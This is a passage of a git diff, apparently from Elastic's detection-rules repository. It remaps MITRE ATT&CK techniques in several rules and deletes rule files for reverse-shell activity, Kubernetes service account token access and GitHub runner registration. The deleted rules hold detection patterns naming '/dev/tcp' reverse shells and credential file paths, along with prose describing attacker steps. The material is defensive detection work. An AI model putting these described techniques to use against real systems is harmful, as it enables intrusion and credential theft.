+id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["user.name", "github.hashed_token"] diff --git a/rules_building_block/persistence_github_new_user_added_to_organization.toml b/rules_building_block/persistence_github_new_user_added_to_organization.toml index 0afb472c332..ebf6de67223 100644 --- a/rules_building_block/persistence_github_new_user_added_to_organization.toml +++ b/rules_building_block/persistence_github_new_user_added_to_organization.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -35,18 +35,19 @@ configuration where event.dataset == "github.audit" and event.action == "org.add [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules_building_block/persistence_iam_instance_request_to_iam_service.toml b/rules_building_block/persistence_iam_instance_request_to_iam_service.toml index 79e94ce2457..e4a2ed6fd5e 100644 --- a/rules_building_block/persistence_iam_instance_request_to_iam_service.toml +++ b/rules_building_block/persistence_iam_instance_request_to_iam_service.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/07/24" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/11/07" [rule] author = ["Elastic"] @@ -84,12 +84,20 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" @@ -100,30 +108,17 @@ id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules_building_block/persistence_startup_folder_lnk.toml b/rules_building_block/persistence_startup_folder_lnk.toml index ac4429fcf95..0cfb8ff93eb 100644 --- a/rules_building_block/persistence_startup_folder_lnk.toml +++ b/rules_building_block/persistence_startup_folder_lnk.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/29" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -48,18 +48,24 @@ file where host.os.type == "windows" and event.type != "deletion" and file.exten [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" +[[rule.threat.technique.subtechnique]] +id = "T1547.009" +name = "Shortcut Modification" +reference = "https://attack.mitre.org/techniques/T1547/009/" + + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules_building_block/persistence_transport_agent_exchange.toml b/rules_building_block/persistence_transport_agent_exchange.toml index d5f3bc49190..cbc31115a3e 100644 --- a/rules_building_block/persistence_transport_agent_exchange.toml +++ b/rules_building_block/persistence_transport_agent_exchange.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/14" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -84,18 +84,36 @@ case_insensitive = true value = "?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*\\\\tmp_????????.???\\\\tmp_????????.???.ps?1" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1505" name = "Server Software Component" reference = "https://attack.mitre.org/techniques/T1505/" - [[rule.threat.technique.subtechnique]] id = "T1505.002" name = "Transport Agent" reference = "https://attack.mitre.org/techniques/T1505/002/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules_building_block/persistence_web_server_potential_sql_injection.toml b/rules_building_block/persistence_web_server_potential_sql_injection.toml index 93d46c613b7..a6611cbeb3b 100644 --- a/rules_building_block/persistence_web_server_potential_sql_injection.toml +++ b/rules_building_block/persistence_web_server_potential_sql_injection.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/11/19" integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/16" [rule] author = ["Elastic"] @@ -28,7 +28,21 @@ name = "Web Server Potential SQL Injection Request" risk_score = 21 rule_id = "7f7a0ee1-7b6f-466a-85b4-110fb105f5e2" severity = "low" -tags = ["Domain: Web", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Reconnaissance", "Data Source: Nginx", "Data Source: Apache", "Data Source: Apache Tomcat", "Data Source: IIS", "Data Source: Traefik", "Rule Type: BBR"] +tags = [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Reconnaissance", + "Tactic: Credential Access", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Data Source: Traefik", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -48,14 +62,45 @@ any where url.original like~ ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -70,6 +115,11 @@ id = "T1595.002" name = "Vulnerability Scanning" reference = "https://attack.mitre.org/techniques/T1595/002/" +[[rule.threat.technique.subtechnique]] +id = "T1595.003" +name = "Wordlist Scanning" +reference = "https://attack.mitre.org/techniques/T1595/003/" + [rule.threat.tactic] id = "TA0043" name = "Reconnaissance" diff --git a/rules_building_block/persistence_web_server_sus_file_creation.toml b/rules_building_block/persistence_web_server_sus_file_creation.toml index 681676e92cf..3141a9913dc 100644 --- a/rules_building_block/persistence_web_server_sus_file_creation.toml +++ b/rules_building_block/persistence_web_server_sus_file_creation.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/03/06" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] @@ -47,7 +47,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "esql" @@ -120,3 +129,34 @@ reference = "https://attack.mitre.org/techniques/T1505/003/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml b/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml index 619231cfd90..39bc5a78dcd 100644 --- a/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml +++ b/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2021/05/17" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/03" [rule] author = ["Austin Songer", "Elastic"] @@ -68,7 +68,17 @@ references = ["https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessio risk_score = 21 rule_id = "b45ab1d2-712f-4f01-a751-df3826969807" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS STS", "Use Case: Identity and Access Audit", "Resources: Investigation Guide", "Rule Type: BBR"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS STS", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "query" @@ -82,21 +92,34 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" - [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" + + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + [rule.investigation_fields] field_names = [ "@timestamp", From c1f5d0c5db19c35caf1b6556457bc591d790ca1d Mon Sep 17 00:00:00 2001 From: Mika Ayenson Date: Tue, 24 Mar 2026 13:46:52 -0500 Subject: [PATCH 10/16] remove renamed files --- ...ontrol_register_github_actions_runner.toml | 108 ------- ..._and_control_revershell_via_shell_cmd.toml | 111 ------- ...ss_followed_by_kubernetes_api_request.toml | 113 ------- ...er_tracking_id_tampering_via_env_vars.toml | 121 -------- ...rnetes_api_request_by_usual_utilities.toml | 112 ------- ...ct_interactive_kubernetes_api_request.toml | 116 -------- ...tes_api_activity_by_unusual_utilities.toml | 164 ----------- ..._server_local_file_inclusion_activity.toml | 177 ----------- ...server_remote_file_inclusion_activity.toml | 116 -------- ...ersistence_sap_netweaver_jsp_webshell.toml | 75 ----- ..._files_compression_inside_a_container.toml | 141 --------- ..._creation_execution_deletion_sequence.toml | 147 ---------- ...e_creation_in_system_binary_locations.toml | 93 ------ ...stener_established_inside_a_container.toml | 115 -------- ...payload_downloaded_and_piped_to_shell.toml | 119 -------- ...ccess_kubelet_certificate_file_access.toml | 101 ------- ...ecutable_via_chmod_inside_a_container.toml | 103 ------- ...ct_interactive_kubernetes_api_request.toml | 143 --------- ...n_suspicious_echo_or_printf_execution.toml | 174 ----------- ...ous_webserver_child_process_execution.toml | 275 ------------------ ...irect_kubelet_access_via_process_args.toml | 94 ------ tests/test_all_rules.py | 118 ++++---- 22 files changed, 57 insertions(+), 2779 deletions(-) delete mode 100644 rules/cross-platform/command_and_control_register_github_actions_runner.toml delete mode 100644 rules/cross-platform/command_and_control_revershell_via_shell_cmd.toml delete mode 100644 rules/cross-platform/credential_access_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml delete mode 100644 rules/cross-platform/defense_evasion_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml delete mode 100644 rules/cross-platform/discovery_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml delete mode 100644 rules/cross-platform/discovery_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml delete mode 100644 rules/cross-platform/discovery_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml delete mode 100644 rules/cross-platform/initial_access_web_server_local_file_inclusion_activity.toml delete mode 100644 rules/cross-platform/initial_access_web_server_remote_file_inclusion_activity.toml delete mode 100644 rules/cross-platform/persistence_sap_netweaver_jsp_webshell.toml delete mode 100644 rules/integrations/cloud_defend/collection_collection_sensitive_files_compression_inside_a_container.toml delete mode 100644 rules/integrations/cloud_defend/command_and_control_file_creation_execution_deletion_sequence.toml delete mode 100644 rules/integrations/cloud_defend/command_and_control_interactive_file_creation_in_system_binary_locations.toml delete mode 100644 rules/integrations/cloud_defend/command_and_control_netcat_listener_established_inside_a_container.toml delete mode 100644 rules/integrations/cloud_defend/command_and_control_payload_downloaded_and_piped_to_shell.toml delete mode 100644 rules/integrations/cloud_defend/credential_access_kubelet_certificate_file_access.toml delete mode 100644 rules/integrations/cloud_defend/defense_evasion_suspicious_file_made_executable_via_chmod_inside_a_container.toml delete mode 100644 rules/integrations/cloud_defend/discovery_direct_interactive_kubernetes_api_request.toml delete mode 100644 rules/integrations/cloud_defend/execution_suspicious_echo_or_printf_execution.toml delete mode 100644 rules/integrations/cloud_defend/execution_suspicious_webserver_child_process_execution.toml delete mode 100644 rules/integrations/cloud_defend/lateral_movement_potential_direct_kubelet_access_via_process_args.toml diff --git a/rules/cross-platform/command_and_control_register_github_actions_runner.toml b/rules/cross-platform/command_and_control_register_github_actions_runner.toml deleted file mode 100644 index 68bacee30b4..00000000000 --- a/rules/cross-platform/command_and_control_register_github_actions_runner.toml +++ /dev/null @@ -1,108 +0,0 @@ -[metadata] -creation_date = "2025/11/26" -integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] -maturity = "production" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects the configuration of a GitHub Actions self-hosted runner using the Runner.Listener binary. -When a machine is registered to a remote repository, its owner gains the ability to execute arbitrary workflow commands on that host. -Unexpected or unauthorized runner registration may indicate adversarial activity aimed at establishing remote code execution -via malicious GitHub workflows. -""" -false_positives = [ - "Authorized github repository with no malicious workflow actions.", -] -from = "now-9m" -index = [ - "endgame-*", - "logs-crowdstrike.fdr*", - "logs-endpoint.events.process-*", - "logs-m365_defender.event-*", - "logs-sentinel_one_cloud_funnel.*", - "logs-system.security*", - "logs-windows.forwarded*", - "logs-windows.sysmon_operational-*", - "winlogbeat-*", - "auditbeat-*", - "logs-auditd_manager.auditd-*" -] -language = "eql" -license = "Elastic License v2" -name = "Remote GitHub Actions Runner Registration" -note = """## Triage and analysis - -### Investigating Remote GitHub Actions Runner Registration - -Unexpected or unauthorized Github actions runner registration may indicate adversarial activity aimed at establishing remote code execution via malicious GitHub workflows. - -### Possible investigation steps - -- Review the remote repository details and reputation. -- Examine the remote repository for any suspicious workflows run commands in the `.github/workflows` folder. -- Examine the execution context like process tree, associated network and file activities. -- Verify if there is adjascent any sensitive file access or collection. -- Correlate with other alerts and investiguate if this activity is related to a supply chain attack. - -### False positive analysis - -- Authorized configuration changes. - -### Response and remediation - -- Immediately isolate the affected system from the network to prevent further unauthorized command execution and potential lateral movement. -- Terminate any suspicious child processes that were initiated by the registered Github actions runner. -- Conduct a thorough review of the affected system's logs and configurations to identify any unauthorized changes or additional indicators of compromise. -- Restore the system from a known good backup if any unauthorized changes or malicious activities are confirmed. -- Implement application whitelisting to prevent unauthorized execution. -- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on the broader network.""" -references = [ - "https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise", - "https://socket.dev/blog/shai-hulud-strikes-again-v2", -] -risk_score = 47 -rule_id = "57e118c1-19eb-4c20-93a6-8a6c30a5b48b" -severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "OS: Windows", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Data Source: Auditd Manager", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" - -query = ''' -process where event.type == "start" and event.action in ("exec", "exec_event", "start", "ProcessRollup2", "executed", "process_started") and - process.name in ("Runner.Listener", "Runner.Listener.exe") and - process.args == "configure" and process.args == "--url" and process.args == "--token" -''' - - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1102" -name = "Web Service" -reference = "https://attack.mitre.org/techniques/T1102/" - -[[rule.threat.technique.subtechnique]] -id = "T1102.002" -name = "Bidirectional Communication" -reference = "https://attack.mitre.org/techniques/T1102/002/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1072" -name = "Software Deployment Tools" -reference = "https://attack.mitre.org/techniques/T1072/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/command_and_control_revershell_via_shell_cmd.toml b/rules/cross-platform/command_and_control_revershell_via_shell_cmd.toml deleted file mode 100644 index 2b950a5e42a..00000000000 --- a/rules/cross-platform/command_and_control_revershell_via_shell_cmd.toml +++ /dev/null @@ -1,111 +0,0 @@ -[metadata] -creation_date = "2020/01/07" -integration = ["endpoint"] -maturity = "production" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = "Identifies the execution of a shell process with suspicious arguments which may be indicative of reverse shell activity." -from = "now-9m" -index = ["auditbeat-*", "logs-endpoint.events.*"] -language = "eql" -license = "Elastic License v2" -name = "Potential Reverse Shell Activity via Terminal" -note = """## Triage and analysis - -### Investigating Potential Reverse Shell Activity via Terminal - -A reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. Even private systems are vulnerable since the connection is outgoing. This activity is typically the result of vulnerability exploitation, malware infection, or penetration testing. - -This rule identifies commands that are potentially related to reverse shell activities using shell applications. - -#### Possible investigation steps - -- Examine the command line and extract the target domain or IP address information. - - Check if the domain is newly registered or unexpected. - - Check the reputation of the domain or IP address. - - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address. -- Investigate other alerts associated with the user/host during the past 48 hours. -- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections. -- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes. - -### False positive analysis - -- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team. - -### Response and remediation - -- Initiate the incident response process based on the outcome of the triage. -- Isolate the involved host to prevent further post-compromise behavior. -- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. -- Take actions to terminate processes and connections used by the attacker. -- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. -- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. -- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). -""" -references = [ - "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md", - "https://github.com/WangYihang/Reverse-Shell-Manager", - "https://www.netsparker.com/blog/web-security/understanding-reverse-shells/", - "https://www.elastic.co/security-labs/detecting-log4j2-with-elastic-security", -] -risk_score = 73 -rule_id = "a1a0375f-22c2-48c0-81a4-7c2d11cc6856" -setup = """## Setup - -If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, -events will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2. -Hence for this rule to work effectively, users will need to add a custom ingest pipeline to populate -`event.ingested` to @timestamp. -For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html -""" -severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend"] -timestamp_override = "event.ingested" -type = "eql" - -query = ''' -process where event.type in ("start", "process_started") and - process.name in ("sh", "bash", "zsh", "dash", "zmodload") and - process.args : ("*/dev/tcp/*", "*/dev/udp/*", "*zsh/net/tcp*", "*zsh/net/udp*") and - - /* noisy FPs */ - not (process.parent.name : "timeout" and process.executable : "/var/lib/docker/overlay*") and - not process.command_line : ( - "*/dev/tcp/sirh_db/*", "*/dev/tcp/remoteiot.com/*", "*dev/tcp/elk.stag.one/*", "*dev/tcp/kafka/*", - "*/dev/tcp/$0/$1*", "*/dev/tcp/127.*", "*/dev/udp/127.*", "*/dev/tcp/localhost/*", "*/dev/tcp/itom-vault/*") and - not process.parent.command_line : "runc init" -''' - - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/credential_access_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml b/rules/cross-platform/credential_access_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml deleted file mode 100644 index 82698e80fea..00000000000 --- a/rules/cross-platform/credential_access_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml +++ /dev/null @@ -1,113 +0,0 @@ -[metadata] -creation_date = "2026/01/21" -integration = ["cloud_defend", "kubernetes"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule leverages a combination of Defend for Containers and Kubernetes audit logs to detect the access to the service -account token or certificate followed by the execution of a direct interactive Kubernetes API request. An adversary may -need to access the service account token or certificate to gain access to the Kubernetes API server or other resources -within the cluster. These requests are often used to enumerate the Kubernetes API server or other resources within the -cluster, and may indicate an attempt to move laterally within the cluster. -""" -false_positives = [ - """ - There is a potential for false positives if the access to the service account token or certificate is used for legitimate purposes, - such as debugging or troubleshooting. It is important to investigate any alerts generated by this rule to determine - if they are indicative of malicious activity or part of legitimate container activity. - """, - """ - There is a risk of false positives if there are several containers named the same, as the rule may correlate the request - to the wrong container. - """, -] -from = "now-6m" -index = ["logs-cloud_defend.file*", "logs-kubernetes.audit_logs-*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "Service Account Token or Certificate Access Followed by Kubernetes API Request" -note = """ ## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating Service Account Token or Certificate Access Followed by Kubernetes API Request - -This rule correlates interactive access to a pod’s service account token or CA certificate with a near-immediate Kubernetes API request, signaling credential harvesting to query the cluster and potential lateral movement. An attacker execs into a container, reads /var/run/secrets/kubernetes.io/serviceaccount/token and ca.crt, then uses curl or kubectl with that token and CA to list pods, get secrets, or create a privileged pod to pivot across nodes. - -### Possible investigation steps - -- Attribute the activity by identifying the pod, container image, node, and interactive session initiator (e.g., kubectl exec) from Kubernetes events and cluster logs to determine whether a human or automation accessed the credentials. -- Retrieve the pod’s service account and enumerate its RBAC bindings to assess effective privileges, highlighting any ability to read secrets, create pods, or modify roles. -- Reconstruct the full sequence of audit log requests tied to that pod/user around the alert, noting resources, verbs, namespaces, response codes, and userAgent to distinguish legitimate controller behavior from reconnaissance. -- Examine the container for signs of token abuse or exfiltration by reviewing shell history and filesystem artifacts, and correlate with network egress from the pod to external destinations. -- Validate that the API request originated from the same pod by matching source IP, node, and TLS client identity, and check for concurrent suspicious activity on the node or other pods. - -### False positive analysis - -- A cluster operator troubleshooting an issue execs into a pod, inspects the service account token or CA certificate, and then uses the pod’s credentials to make a quick Kubernetes API request to verify permissions or list resources. -- A workload running with TTY/stdin enabled is marked as interactive, and the application legitimately reads the service account token (e.g., on startup or token refresh) to perform routine API operations such as leader election or informer watches, producing the observed file access followed by audit log activity. - -### Response and remediation - -- Immediately isolate the pod that read /var/run/secrets/kubernetes.io/serviceaccount/token or ca.crt by deleting the pod or scaling its deployment to zero, cordoning its node if similar behavior is seen on other pods, and applying a NetworkPolicy that blocks the pod’s access to the API server while you capture its filesystem. -- Revoke access by removing the implicated service account’s RBAC bindings, recreating the service account to invalidate tokens, restarting any workloads that mount /var/run/secrets/kubernetes.io/serviceaccount, and rotating the service-account signing key if compromise is suspected. -- Validate and recover by reviewing audit records for unauthorized actions (e.g., secrets reads, pod or role changes), rolling back or deleting any malicious resources, and redeploying affected workloads from trusted images with signed releases. -- Escalate to incident response immediately if you observe API requests from the pod that read secrets, create pods in other namespaces, alter Role or ClusterRoleBindings, or transmit the token/ca.crt via curl or similar tooling to external addresses. -- Harden by disabling automountServiceAccountToken on pods that don't require it, scoping service accounts to a single namespace with least‑privilege RBAC, enforcing Pod Security Admission to block privileged/interactive shells, and restricting exec/attach via RBAC or admission policies. -""" -risk_score = 47 -rule_id = "4bd306f9-ee89-4083-91af-e61ed5c42b9a" -severity = "medium" -tags = ["Tactic: Credential Access", "Tactic: Lateral Movement", "Data Source: Elastic Defend for Containers", "Data Source: Kubernetes", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" -query = ''' -sequence with maxspan=60s - [file where host.os.type == "linux" and event.type == "change" and event.action == "open" and - file.path in ("/var/run/secrets/kubernetes.io/serviceaccount/token", "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt") and - process.interactive == true and container.id like "*"] by orchestrator.resource.name - [any where event.dataset == "kubernetes.audit_logs" and kubernetes.audit.stage in ("ResponseComplete", "ResponseStarted")] by `kubernetes.audit.user.extra.authentication.kubernetes.io/pod-name` -''' - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential 